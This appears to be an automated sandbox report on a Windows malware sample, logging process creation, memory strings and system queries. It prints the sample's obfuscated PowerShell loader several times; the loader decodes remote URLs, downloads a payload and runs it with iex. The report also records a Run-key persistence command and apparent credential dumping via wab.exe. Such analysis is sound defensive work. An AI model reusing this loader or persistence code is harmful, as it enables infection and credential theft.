Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (Brandmyndighe	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Proskriberes.Bet && echo t"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "gstes" /t REG_EXPAND_SZ /d "%Udvalgenes215% -w 1 $Kofta=(Get-ItemProperty -Path 'HKCU:\Fiberstof\').Ufuldkommenheds;%Udvalgenes215% ($Kofta)"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ycflhgp"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ycflhgp"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ycflhgp"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\iesdayaqqeg"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\iesdayaqqeg"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tyyoarljemyfhm"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\memvbbncbrxabktzvniruuteatm.vbs"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "gstes" /t REG_EXPAND_SZ /d "%Udvalgenes215% -w 1 $Kofta=(Get-ItemProperty -Path 'HKCU:\Fiberstof\').Ufuldkommenheds;%Udvalgenes215% ($Kofta)"	Jump to behavior

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'stumpnser midernes fugtighedscremerne tilkaldte lancinated territorializations feest digammate fattigfint dossiers konvojeredes rudyard filmologerne tandpiner griqua augustly pantningens univalve scalping spectromicroscopical autoklaveringerne hjlpeprsters brotherlike inflationr stumpnser midernes fugtighedscremerne tilkaldte lancinated territorializations feest digammate fattigfint dossiers konvojeredes rudyard filmologerne tandpiner griqua augustly pantningens univalve scalping spectromicroscopical autoklaveringerne hjlpeprsters brotherlike inflationr';if (${host}.currentculture) {$anthranyl++;}function brandmyndighederne($emblemers){$eventyrroman=$emblemers.length-$anthranyl;$hawsing='substri';$hawsing+='ng';for( $daghesh=1;$daghesh -lt $eventyrroman;$daghesh+=2){$stumpnser+=$emblemers.$hawsing.invoke( $daghesh, $anthranyl);}$stumpnser;}function opdateringsprogrammet($etruscan){ & ($androlepsia) ($etruscan);}$garvin=brandmyndighederne 'am.o zci,l,lfai/h5 .r0b ,( w i.n,dsolw sm ,n t. 1.0a.a0 ;f aw i nu6.4,;. nx 6 4b;s trtv : 1 2s1 . 0 )v sgpe cvkiot/b2 0i1s0r0 1,0i1t sf ior esfto,xh/c1u2 1 .b0 ';$maltreated=brandmyndighederne '.urs e rc-ka g.e,n ti ';$lancinated=brandmyndighederne 'oh t,t pps :b/h/,c o.nmtae mserg as..ctowm .jduo./sn e dvstlja gpn isnsgas.. dswops>kh t tsp s :p/,/pm o,vbide srmoa crk t a,lhkb.rc o ms/,n.eodhsuloasgcnfi.nbg s,.,dswgp ';$shrugging=brandmyndighederne 's> ';$androlepsia=brandmyndighederne '.iye.xr ';$trendies='digammate';$debarrance = brandmyndighederne 'aebc.hsog %ba p pfdpawtoa %o\ap.r ogs kgr i.b.exr ensk.,buectt &c&, e c hsot kt ';opdateringsprogrammet (brandmyndighederne ' $,g l,o.b.ahl,: s.a.l g,s.e neh,efdme,rhsd=p( c mrds k/ cc ,$md e,b,avr raa,n caes) ');opdateringsprogrammet (brandmyndighederne ',$rgiluo b acl,:itri l kpaul.dtt,es=.$plaabn c,isn.artle dt.iskp lri t.(,$,sfh,rgungtgvi nmgs)f ');opdateringsprogrammet (brandmyndighederne ' [bnfeate. s ecr v,itc.e.p,o isnptvmfadn,abgfe rj]h: : s ebcgu,rti tsyupnr optuopcvosl a= t[cn eftl. sme,c.usr,iet,ysp r,ostso csoilstey pse ],:v: t ltsu1e2. ');$lancinated=$tilkaldte[0];$acupressure= (brandmyndighederne 's$ag,l o.bgapls:sskoam mhedr,f,uogdl e,n egtftcect,s = nme.ws- otbsj,egc ts .sbyrs tcetms.inseat .,wiedbkcclii edn t');$acupressure+=$salgsenheders[1];opdateringsprogrammet ($acupressure);opdateringsprogrammet (brandmyndighederne 'd$ssso mfmse r feu grlseknse t taehths .,h e a,dcebr s [b$mmfahl.t.r,e a t e d,]h=d$ gea ravrirnt ');$nourishments=brandmyndighederne 'p$kscogmlmoeer ffu,g lue.nse t t eotoss.fd.o w nfl osa d f.iulte ( $ l a,nkc i nea tfesd., $ hrj.l p.e pmr sjtfear.s ), ';$hjlpeprsters=$salgsenheders[0];opdateringsprogrammet (brandmyndighederne '.$kg,loo b.a ls:bavshp e.r.ssiao,nts 2 3,=.(stceus tk-bpnart.h s$ih jmlap,e p r,s,t e,rms )k ');while (!$aspersions23) {opdateringsprogrammet (brandmyndighe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "cls;write 'stumpnser midernes fugtighedscremerne tilkaldte lancinated territorializations feest digammate fattigfint dossiers konvojeredes rudyard filmologerne tandpiner griqua augustly pantningens univalve scalping spectromicroscopical autoklaveringerne hjlpeprsters brotherlike inflationr stumpnser midernes fugtighedscremerne tilkaldte lancinated territorializations feest digammate fattigfint dossiers konvojeredes rudyard filmologerne tandpiner griqua augustly pantningens univalve scalping spectromicroscopical autoklaveringerne hjlpeprsters brotherlike inflationr';if (${host}.currentculture) {$anthranyl++;}function brandmyndighederne($emblemers){$eventyrroman=$emblemers.length-$anthranyl;$hawsing='substri';$hawsing+='ng';for( $daghesh=1;$daghesh -lt $eventyrroman;$daghesh+=2){$stumpnser+=$emblemers.$hawsing.invoke( $daghesh, $anthranyl);}$stumpnser;}function opdateringsprogrammet($etruscan){ & ($androlepsia) ($etruscan);}$garvin=brandmyndighederne 'am.o zci,l,lfai/h5 .r0b ,( w i.n,dsolw sm ,n t. 1.0a.a0 ;f aw i nu6.4,;. nx 6 4b;s trtv : 1 2s1 . 0 )v sgpe cvkiot/b2 0i1s0r0 1,0i1t sf ior esfto,xh/c1u2 1 .b0 ';$maltreated=brandmyndighederne '.urs e rc-ka g.e,n ti ';$lancinated=brandmyndighederne 'oh t,t pps :b/h/,c o.nmtae mserg as..ctowm .jduo./sn e dvstlja gpn isnsgas.. dswops>kh t tsp s :p/,/pm o,vbide srmoa crk t a,lhkb.rc o ms/,n.eodhsuloasgcnfi.nbg s,.,dswgp ';$shrugging=brandmyndighederne 's> ';$androlepsia=brandmyndighederne '.iye.xr ';$trendies='digammate';$debarrance = brandmyndighederne 'aebc.hsog %ba p pfdpawtoa %o\ap.r ogs kgr i.b.exr ensk.,buectt &c&, e c hsot kt ';opdateringsprogrammet (brandmyndighederne ' $,g l,o.b.ahl,: s.a.l g,s.e neh,efdme,rhsd=p( c mrds k/ cc ,$md e,b,avr raa,n caes) ');opdateringsprogrammet (brandmyndighederne ',$rgiluo b acl,:itri l kpaul.dtt,es=.$plaabn c,isn.artle dt.iskp lri t.(,$,sfh,rgungtgvi nmgs)f ');opdateringsprogrammet (brandmyndighederne ' [bnfeate. s ecr v,itc.e.p,o isnptvmfadn,abgfe rj]h: : s ebcgu,rti tsyupnr optuopcvosl a= t[cn eftl. sme,c.usr,iet,ysp r,ostso csoilstey pse ],:v: t ltsu1e2. ');$lancinated=$tilkaldte[0];$acupressure= (brandmyndighederne 's$ag,l o.bgapls:sskoam mhedr,f,uogdl e,n egtftcect,s = nme.ws- otbsj,egc ts .sbyrs tcetms.inseat .,wiedbkcclii edn t');$acupressure+=$salgsenheders[1];opdateringsprogrammet ($acupressure);opdateringsprogrammet (brandmyndighederne 'd$ssso mfmse r feu grlseknse t taehths .,h e a,dcebr s [b$mmfahl.t.r,e a t e d,]h=d$ gea ravrirnt ');$nourishments=brandmyndighederne 'p$kscogmlmoeer ffu,g lue.nse t t eotoss.fd.o w nfl osa d f.iulte ( $ l a,nkc i nea tfesd., $ hrj.l p.e pmr sjtfear.s ), ';$hjlpeprsters=$salgsenheders[0];opdateringsprogrammet (brandmyndighederne '.$kg,loo b.a ls:bavshp e.r.ssiao,nts 2 3,=.(stceus tk-bpnart.h s$ih jmlap,e p r,s,t e,rms )k ');while (!$aspersions23) {opdateringsprogrammet (brandmyndighe
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'stumpnser midernes fugtighedscremerne tilkaldte lancinated territorializations feest digammate fattigfint dossiers konvojeredes rudyard filmologerne tandpiner griqua augustly pantningens univalve scalping spectromicroscopical autoklaveringerne hjlpeprsters brotherlike inflationr stumpnser midernes fugtighedscremerne tilkaldte lancinated territorializations feest digammate fattigfint dossiers konvojeredes rudyard filmologerne tandpiner griqua augustly pantningens univalve scalping spectromicroscopical autoklaveringerne hjlpeprsters brotherlike inflationr';if (${host}.currentculture) {$anthranyl++;}function brandmyndighederne($emblemers){$eventyrroman=$emblemers.length-$anthranyl;$hawsing='substri';$hawsing+='ng';for( $daghesh=1;$daghesh -lt $eventyrroman;$daghesh+=2){$stumpnser+=$emblemers.$hawsing.invoke( $daghesh, $anthranyl);}$stumpnser;}function opdateringsprogrammet($etruscan){ & ($androlepsia) ($etruscan);}$garvin=brandmyndighederne 'am.o zci,l,lfai/h5 .r0b ,( w i.n,dsolw sm ,n t. 1.0a.a0 ;f aw i nu6.4,;. nx 6 4b;s trtv : 1 2s1 . 0 )v sgpe cvkiot/b2 0i1s0r0 1,0i1t sf ior esfto,xh/c1u2 1 .b0 ';$maltreated=brandmyndighederne '.urs e rc-ka g.e,n ti ';$lancinated=brandmyndighederne 'oh t,t pps :b/h/,c o.nmtae mserg as..ctowm .jduo./sn e dvstlja gpn isnsgas.. dswops>kh t tsp s :p/,/pm o,vbide srmoa crk t a,lhkb.rc o ms/,n.eodhsuloasgcnfi.nbg s,.,dswgp ';$shrugging=brandmyndighederne 's> ';$androlepsia=brandmyndighederne '.iye.xr ';$trendies='digammate';$debarrance = brandmyndighederne 'aebc.hsog %ba p pfdpawtoa %o\ap.r ogs kgr i.b.exr ensk.,buectt &c&, e c hsot kt ';opdateringsprogrammet (brandmyndighederne ' $,g l,o.b.ahl,: s.a.l g,s.e neh,efdme,rhsd=p( c mrds k/ cc ,$md e,b,avr raa,n caes) ');opdateringsprogrammet (brandmyndighederne ',$rgiluo b acl,:itri l kpaul.dtt,es=.$plaabn c,isn.artle dt.iskp lri t.(,$,sfh,rgungtgvi nmgs)f ');opdateringsprogrammet (brandmyndighederne ' [bnfeate. s ecr v,itc.e.p,o isnptvmfadn,abgfe rj]h: : s ebcgu,rti tsyupnr optuopcvosl a= t[cn eftl. sme,c.usr,iet,ysp r,ostso csoilstey pse ],:v: t ltsu1e2. ');$lancinated=$tilkaldte[0];$acupressure= (brandmyndighederne 's$ag,l o.bgapls:sskoam mhedr,f,uogdl e,n egtftcect,s = nme.ws- otbsj,egc ts .sbyrs tcetms.inseat .,wiedbkcclii edn t');$acupressure+=$salgsenheders[1];opdateringsprogrammet ($acupressure);opdateringsprogrammet (brandmyndighederne 'd$ssso mfmse r feu grlseknse t taehths .,h e a,dcebr s [b$mmfahl.t.r,e a t e d,]h=d$ gea ravrirnt ');$nourishments=brandmyndighederne 'p$kscogmlmoeer ffu,g lue.nse t t eotoss.fd.o w nfl osa d f.iulte ( $ l a,nkc i nea tfesd., $ hrj.l p.e pmr sjtfear.s ), ';$hjlpeprsters=$salgsenheders[0];opdateringsprogrammet (brandmyndighederne '.$kg,loo b.a ls:bavshp e.r.ssiao,nts 2 3,=.(stceus tk-bpnart.h s$ih jmlap,e p r,s,t e,rms )k ');while (!$aspersions23) {opdateringsprogrammet (brandmyndighe	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "cls;write 'stumpnser midernes fugtighedscremerne tilkaldte lancinated territorializations feest digammate fattigfint dossiers konvojeredes rudyard filmologerne tandpiner griqua augustly pantningens univalve scalping spectromicroscopical autoklaveringerne hjlpeprsters brotherlike inflationr stumpnser midernes fugtighedscremerne tilkaldte lancinated territorializations feest digammate fattigfint dossiers konvojeredes rudyard filmologerne tandpiner griqua augustly pantningens univalve scalping spectromicroscopical autoklaveringerne hjlpeprsters brotherlike inflationr';if (${host}.currentculture) {$anthranyl++;}function brandmyndighederne($emblemers){$eventyrroman=$emblemers.length-$anthranyl;$hawsing='substri';$hawsing+='ng';for( $daghesh=1;$daghesh -lt $eventyrroman;$daghesh+=2){$stumpnser+=$emblemers.$hawsing.invoke( $daghesh, $anthranyl);}$stumpnser;}function opdateringsprogrammet($etruscan){ & ($androlepsia) ($etruscan);}$garvin=brandmyndighederne 'am.o zci,l,lfai/h5 .r0b ,( w i.n,dsolw sm ,n t. 1.0a.a0 ;f aw i nu6.4,;. nx 6 4b;s trtv : 1 2s1 . 0 )v sgpe cvkiot/b2 0i1s0r0 1,0i1t sf ior esfto,xh/c1u2 1 .b0 ';$maltreated=brandmyndighederne '.urs e rc-ka g.e,n ti ';$lancinated=brandmyndighederne 'oh t,t pps :b/h/,c o.nmtae mserg as..ctowm .jduo./sn e dvstlja gpn isnsgas.. dswops>kh t tsp s :p/,/pm o,vbide srmoa crk t a,lhkb.rc o ms/,n.eodhsuloasgcnfi.nbg s,.,dswgp ';$shrugging=brandmyndighederne 's> ';$androlepsia=brandmyndighederne '.iye.xr ';$trendies='digammate';$debarrance = brandmyndighederne 'aebc.hsog %ba p pfdpawtoa %o\ap.r ogs kgr i.b.exr ensk.,buectt &c&, e c hsot kt ';opdateringsprogrammet (brandmyndighederne ' $,g l,o.b.ahl,: s.a.l g,s.e neh,efdme,rhsd=p( c mrds k/ cc ,$md e,b,avr raa,n caes) ');opdateringsprogrammet (brandmyndighederne ',$rgiluo b acl,:itri l kpaul.dtt,es=.$plaabn c,isn.artle dt.iskp lri t.(,$,sfh,rgungtgvi nmgs)f ');opdateringsprogrammet (brandmyndighederne ' [bnfeate. s ecr v,itc.e.p,o isnptvmfadn,abgfe rj]h: : s ebcgu,rti tsyupnr optuopcvosl a= t[cn eftl. sme,c.usr,iet,ysp r,ostso csoilstey pse ],:v: t ltsu1e2. ');$lancinated=$tilkaldte[0];$acupressure= (brandmyndighederne 's$ag,l o.bgapls:sskoam mhedr,f,uogdl e,n egtftcect,s = nme.ws- otbsj,egc ts .sbyrs tcetms.inseat .,wiedbkcclii edn t');$acupressure+=$salgsenheders[1];opdateringsprogrammet ($acupressure);opdateringsprogrammet (brandmyndighederne 'd$ssso mfmse r feu grlseknse t taehths .,h e a,dcebr s [b$mmfahl.t.r,e a t e d,]h=d$ gea ravrirnt ');$nourishments=brandmyndighederne 'p$kscogmlmoeer ffu,g lue.nse t t eotoss.fd.o w nfl osa d f.iulte ( $ l a,nkc i nea tfesd., $ hrj.l p.e pmr sjtfear.s ), ';$hjlpeprsters=$salgsenheders[0];opdateringsprogrammet (brandmyndighederne '.$kg,loo b.a ls:bavshp e.r.ssiao,nts 2 3,=.(stceus tk-bpnart.h s$ih jmlap,e p r,s,t e,rms )k ');while (!$aspersions23) {opdateringsprogrammet (brandmyndighe	Jump to behavior

Source: wab.exe, 0000000A.00000003.2025037592.00000000005D2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerE
Source: wab.exe, 0000000A.00000002.2246278943.0000000000579000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: wab.exe, 0000000A.00000002.2246278943.0000000000579000.00000004.00000020.00020000.00000000.sdmp, kpburtts.dat.10.dr	Binary or memory string: [2024/07/01 10:19:54 Program Manager]
Source: wab.exe, 0000000A.00000003.1988708190.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2025037592.00000000005D2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.1987753034.00000000005D6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager)
Source: wab.exe, 0000000A.00000003.2025037592.00000000005D2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerlesj
Source: wab.exe, 0000000A.00000002.2246278943.0000000000579000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 54 Program Manager]
Source: wab.exe, 0000000A.00000003.2025037592.00000000005D2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerlesR
Source: wab.exe, 0000000A.00000002.2246278943.0000000000579000.00000004.00000020.00020000.00000000.sdmp, kpburtts.dat.10.dr	Binary or memory string: [2024/07/01 10:20:03 Program Manager]

Contains functionality to query CPU information (cpuid)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 10_2_22B22933 cpuid

10_2_22B22933

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
